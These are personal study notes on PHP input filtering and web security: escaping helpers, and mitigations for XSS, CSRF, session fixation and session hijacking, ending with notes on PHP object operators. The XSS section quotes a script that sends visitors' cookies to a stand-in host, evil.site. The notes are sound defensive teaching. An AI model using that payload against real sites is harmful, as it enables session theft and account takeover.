PHP -- filter

Notes toward a more systematic approach . . . .

Overlaps with FORMS.PHP. Decide what goes where.

In the first section, outline the various borders that need guarding:

$_GET, $_POST, $_REQUEST
$_COOKIE
$_SESSION
$_SERVER
database
files
RSS feeds

Preparing variables for MySQL and HTML output

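function sql_prep( $arr, $dbc ) { // $dbc is a mysqli object; objects need no & to be shared
	$sql = array(); // an empty input still returns an array
	foreach ($arr as $k => $v) {
		$sql[$k] = $dbc->real_escape_string($v);
	}
	return $sql;
}
function html_prep($arr) {
	$html = array();
	foreach ($arr as $k => $v) {
		$html[$k] = htmlspecialchars($v, ENT_QUOTES, 'UTF-8');
	}
	return $html;
}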

$sqlarr = sql_prep( $clean, $dbc );
$htmlarr = html_prep( $clean );

In this example, $clean provides the source for $sqlarr and $htmlarr, but remains unchanged.

Alternatively, if the target arrays were passed by reference, you could fill them directly.

function sql_prep( $arr, &$sql, $dbc ) {
	foreach ($arr as $k => $v) {
		$sql[$k] = $dbc->real_escape_string($v);
	}
}
function html_prep( $arr, &$html ) {
	foreach ($arr as $k => $v) {
		// escape for HTML here, not for SQL; $dbc is not in scope in this function
		$html[$k] = htmlspecialchars($v, ENT_QUOTES, 'UTF-8');
	}
}
$sqlarr=array();
$htmlarr=array();
sql_prep( $clean, $sqlarr, $dbc );
html_prep( $clean, $htmlarr );

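That should conserve resources, since a temporary array isn't created and returned. But it tests slower, probably because PHP's copy-on-write arrays already make returning an array cheap, while references carry overhead of their own. Hmm . . . .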

A static class could consolidate the preparation for SQL and HTML use.

class getarray {
	static function tosql($v) {
		global $dbc; // assumes a mysqli connection in the global scope
		return $dbc->real_escape_string($v);
	}
	static function tohtml($v) {
		return htmlspecialchars($v, ENT_QUOTES, 'UTF-8');
	}
	static function _for( $type, $inarr ) {
		$func='to'.$type; // create method name from $type arg
		$outarr=array(); // an empty input still returns an array
		foreach($inarr as $k=>$v) $outarr[$k]=self::$func($v);
		return $outarr;
	}
}
$sqlarr=getarray::_for('sql',$clean);
$htmlarr=getarray::_for('html',$clean);

This cuts out duplication by removing the redundant foreach loops.

On the other hand, it inserts an extra function call inside a loop, which you usually want to avoid.
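
Another way to keep a single loop is array_map() with a callback. This is only a sketch of the idea, not a measured improvement; prep_for_html() is a name invented here, and only the HTML case is shown so that no database connection is assumed.

```php
<?php
// Hypothetical helper: escape every value of an array for HTML output.
// array_map() preserves keys when it is given exactly one array.
function prep_for_html(array $arr) {
	return array_map(function ($v) {
		return htmlspecialchars((string) $v, ENT_QUOTES, 'UTF-8');
	}, $arr);
}

$clean = array('name' => 'Tom & "Jerry"', 'note' => '<b>hi</b>');
$htmlarr = prep_for_html($clean);
echo $htmlarr['name'], "\n"; // Tom &amp; &quot;Jerry&quot;
```

The callback is still invoked once per element, so this tidies the code more than it speeds it up. Measure before choosing.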

possibly flesh out the following for quick reference

common types of attacks

Following notes from Chapter 2 of Chris Shiflett's PHP Security Guide.

semantic URL attacks

VECTOR: User rigs the URL to provide values that seem to come from a form.

GET request method susceptible to this, since the URL can be edited transparently.

PHP's $_SERVER['PHP_SELF'] reflects this tainted input naively. It's an open door into your application.

MITIGATION: Relies on working around the stateless protocol. Use session variables to test incoming data to ensure the apparent submission really originated from your form. Example:

session_start();
if (isset($_GET['user'])) { // form is being submitted; user var might be rigged
	if (isset($_SESSION['verified'], $_SESSION['user']) // was user verified by earlier use of the form?
		&& $_SESSION['user'] === $_GET['user']) { // do user names match?
		// safe to act on $_GET['user']
	} else {
		// mismatch: reject the request or prompt for the password
	}
}

file upload

VECTOR (theoretical—no known exploit in 2004): Naively trusting tmp_name (provided by PHP) could allow system files to be overwritten, e.g., if attacker managed to insert /etc/passwd or similar as value.

When a file is uploaded, PHP's $_FILES array contains the name, type, tmp_name, and size of the uploaded file.

It doesn't indicate the source of the file — who sent it from where.

MITIGATION:

test with is_uploaded_file(), if reading into memory
use move_uploaded_file(), which performs the same check before moving, if copying to permanent location
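
The two checks above might be combined roughly as follows. This is a sketch under assumptions: store_upload() is a hypothetical helper, and the field name "userfile" and the upload directory in the usage comment are placeholders, not values from these notes.

```php
<?php
// Hypothetical helper: move one entry of $_FILES into $destDir.
// Returns the new path on success, false on any failure.
function store_upload(array $file, $destDir) {
	if (!isset($file['error'], $file['tmp_name'], $file['name'])
		|| $file['error'] !== UPLOAD_ERR_OK) {
		return false;
	}
	// Reject anything PHP did not receive as an HTTP POST upload.
	if (!is_uploaded_file($file['tmp_name'])) {
		return false;
	}
	// Never use the client-supplied name as a path; keep only its basename.
	$target = rtrim($destDir, '/') . '/' . basename($file['name']);
	// move_uploaded_file() repeats the upload check before moving.
	return move_uploaded_file($file['tmp_name'], $target) ? $target : false;
}

// Usage, assuming a form field named "userfile" and a writable directory:
// $path = store_upload($_FILES['userfile'], '/var/www/uploads');
```

A file that merely exists on the server, such as /etc/passwd, fails the is_uploaded_file() test, which is the point of the check.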

XSS — cross-site scripting

VECTOR: Malicious script embedded in data, such as a "comment" field or a URL GET variable.

Attacker submits this in a TEXTAREA comment:

<script>
document.location='http://evil.site/steal.php?cookies=' + document.cookie
</script>

Users who view this comment send the cookies used by your app to evil.site, where steal.php reads $_GET['cookies'] for their data.

MITIGATION:

filter input with str_replace, preg_match, a ctype function, or one of PHP's filter types
output: htmlentities($clean['comment'], ENT_QUOTES, 'UTF-8')
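
A rough sketch of both halves, filtering on input and escaping on output. The whitelist pattern and the 500-character limit are assumptions chosen for illustration, and filter_comment() is a hypothetical helper, not a PHP built-in.

```php
<?php
// Hypothetical helper: accept a comment only if it passes a whitelist check.
// Assumption: comments may hold letters, digits, whitespace, and basic punctuation.
function filter_comment($raw) {
	if (!is_string($raw) || !preg_match('/^[\w\s.,!?\'"-]{1,500}$/u', $raw)) {
		return null; // rejected
	}
	return $raw;
}

$attack = "<script>document.location='http://evil.site/steal.php'</script>";
var_dump(filter_comment($attack)); // NULL: angle brackets are not whitelisted

// Escaping on output renders the markup inert even if the filter is bypassed.
echo htmlentities($attack, ENT_QUOTES, 'UTF-8'), "\n";
```

The two steps are independent on purpose: the filter decides what is stored, and the escaping protects every page that later displays it.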

CSRF — cross-site request forgery

The forged request is sent by the unwitting victim.

VECTOR: Victim visits bad site that contains an IMG tag with a rigged SRC attribute.

The SRC string exploits a weakness in an app that lets a GET request change data (place orders, etc.).
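
No mitigation is recorded here yet. A commonly used one is to accept data-changing requests only by POST and to require a per-session token that a forged IMG request cannot know. The sketch below assumes PHP 7+ for random_bytes(); csrf_token() and csrf_check() are hypothetical helpers, and $session stands in for $_SESSION so the code runs outside a web request.

```php
<?php
// Hypothetical helper: create the session's token once, then reuse it.
function csrf_token(array &$session) {
	if (empty($session['csrf_token'])) {
		$session['csrf_token'] = bin2hex(random_bytes(16)); // PHP 7+
	}
	return $session['csrf_token'];
}

// Hypothetical helper: true only for a POST carrying the session's token.
function csrf_check(array $session, $method, array $post) {
	return $method === 'POST'
		&& isset($session['csrf_token'], $post['csrf_token'])
		&& is_string($post['csrf_token'])
		&& hash_equals($session['csrf_token'], $post['csrf_token']);
}

$session = array();
$token = csrf_token($session); // embed this in a hidden form field
var_dump(csrf_check($session, 'GET', array()));                        // bool(false)
var_dump(csrf_check($session, 'POST', array('csrf_token' => $token))); // bool(true)
```

In a real page the calls would be csrf_token($_SESSION) when printing the form and csrf_check($_SESSION, $_SERVER['REQUEST_METHOD'], $_POST) when handling it.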

session fixation

VECTOR: attacker lures victim to his page that contains a rigged element.

HREF in a link
HEADER('location:...')
REFRESH header
HTTP-EQUIV attribute in a meta tag

The element contains a link to your site and a session ID the attacker provides. This is a stepping stone to more dangerous attacks.

It works because, if no session with that ID exists yet, PHP creates a new session using the ID supplied by the attacker.

MITIGATION: call session_regenerate_id() whenever a user's privilege changes.

Regenerating the ID only when a session starts is not enough, since the attacker can visit your site first and obtain a valid session ID to plant. If a new session ID is generated after the user authenticates, the attacker can't learn it unless he can authenticate as that user himself.
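
A minimal sketch of regenerating the ID at the moment privilege changes. mark_logged_in() is a hypothetical helper, and the credential check is assumed to have succeeded before it is called.

```php
<?php
// Hypothetical login step, called only after the password has been verified.
function mark_logged_in($user) {
	if (session_status() !== PHP_SESSION_ACTIVE) {
		session_start();
	}
	// Issue a fresh ID and delete the old session data, so an ID planted
	// by an attacker before login no longer points at this session.
	session_regenerate_id(true);
	$_SESSION['user'] = $user;
	$_SESSION['verified'] = true;
}
```

The same call belongs anywhere else a user's privilege level changes, for example when entering an admin area.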

If attacker can lure victim to his evil site after user has authenticated, then what? (Probably that's covered in "session hijacking.")

session hijacking

VECTOR: attacker gains session ID and uses it to access your site from a different location

MITIGATION: consistency check — prompt for password if USER AGENT suddenly changes.

A typical HTTP request.

GET / HTTP/1.1
Host: example.org
User-Agent: Mozilla/5.0 Gecko
Accept: text/xml, image/png, image/jpeg, image/gif, */*
Cookie: PHPSESSID=1234

Same request from probable attacker.

GET / HTTP/1.1
Host: example.org
User-Agent: Mozilla Compatible (MSIE)
Accept: text/xml, image/png, image/jpeg, image/gif, */*
Cookie: PHPSESSID=1234

A change in User-Agent is unlikely for a legitimate user. Check for a change this way.

<?php
session_start();
// hash the current User-Agent; treat a missing header as an empty string
$agent = md5( isset( $_SERVER['HTTP_USER_AGENT'] ) ? $_SERVER['HTTP_USER_AGENT'] : '' );
if ( isset( $_SESSION['HTTP_USER_AGENT'] ) ) {
	if ( $_SESSION['HTTP_USER_AGENT'] !== $agent ) {
		/* code here to prompt for password */
		exit;
	}
} else {
	// store hashed User-Agent for later comparison
	$_SESSION['HTTP_USER_AGENT'] = $agent;
}
?>

However, if the victim has visited the attacker's site, the attacker may have captured the victim's request headers along with the cookie and can send a matching User-Agent.

Consider adding a random token to all internal links on your site. Each session gets a token stored in the $_SESSION array, and each link has $_SESSION['token'] appended to its URL.

When the attacker uses a captured session ID, he requests a URL without the correct token ($_GET['token']), and the request can be rejected.
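
The token scheme could be sketched as below. All three helpers are hypothetical, $session stands in for $_SESSION so the code runs outside a web request, and random_bytes() assumes PHP 7+.

```php
<?php
// Hypothetical helper: create the session's link token once, then reuse it.
function session_token(array &$session) {
	if (empty($session['token'])) {
		$session['token'] = bin2hex(random_bytes(16)); // PHP 7+
	}
	return $session['token'];
}

// Append the token to an internal URL, respecting an existing query string.
function tokenized_url($url, $token) {
	$sep = (strpos($url, '?') === false) ? '?' : '&';
	return $url . $sep . 'token=' . urlencode($token);
}

// True only when the request carries the token stored for this session.
function token_matches(array $session, array $get) {
	return isset($session['token'], $get['token'])
		&& is_string($get['token'])
		&& hash_equals($session['token'], $get['token']);
}

$session = array('token' => 'abc123'); // fixed value for the demonstration only
echo tokenized_url('/account.php?id=3', session_token($session)), "\n"; // /account.php?id=3&token=abc123
var_dump(token_matches($session, array())); // bool(false): no token in the request
```

When the URL is printed inside HTML, pass it through htmlspecialchars() so the & separator is escaped.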

The next section should probably go in an OBJECTS category.

:: vs ->

The arrow operator -> refers to an object's variable or function.

The scope resolution operator :: refers to a class's variable or function, or to a constant in a class or an object.

class myclass {
	public static $name='The original class string.';

	public static function dosomething() {
		return static::$name . ' returned by function';
	}
}

class myclass2 extends myclass {
	function dosomethingelse() { // a non-static method could not reuse the name dosomething()
		return self::dosomething() . ', via object.';
	}
}

$myobject = new myclass2;

echo "\n" . myclass::$name; // a static var in myclass
echo "\n" . myclass::dosomething(); // a static method in myclass
echo "\n" . myclass2::dosomething(); // a static method inherited by myclass2
echo "\n" . $myobject->dosomethingelse(); // a regular method in myobject

Because dosomething() is static, the "::" operator is used to call it.
Hence, self::dosomething() inside the dosomethingelse() method.

Because dosomethingelse() is not static, the "->" operator is used to call it.
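
The constant case mentioned earlier, reached through both a class and an object, might look like this. The class name limits and its members are invented for illustration.

```php
<?php
class limits {
	const MAX = 10;    // class constant: no $ sign, always reached with ::
	public $used = 3;  // instance property: reached with ->

	public function remaining() {
		return self::MAX - $this->used;
	}
}

$obj = new limits;
echo limits::MAX, "\n";       // 10, via the class name
echo $obj::MAX, "\n";         // 10, via an object (PHP 5.3+)
echo $obj->remaining(), "\n"; // 7
```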

filter variables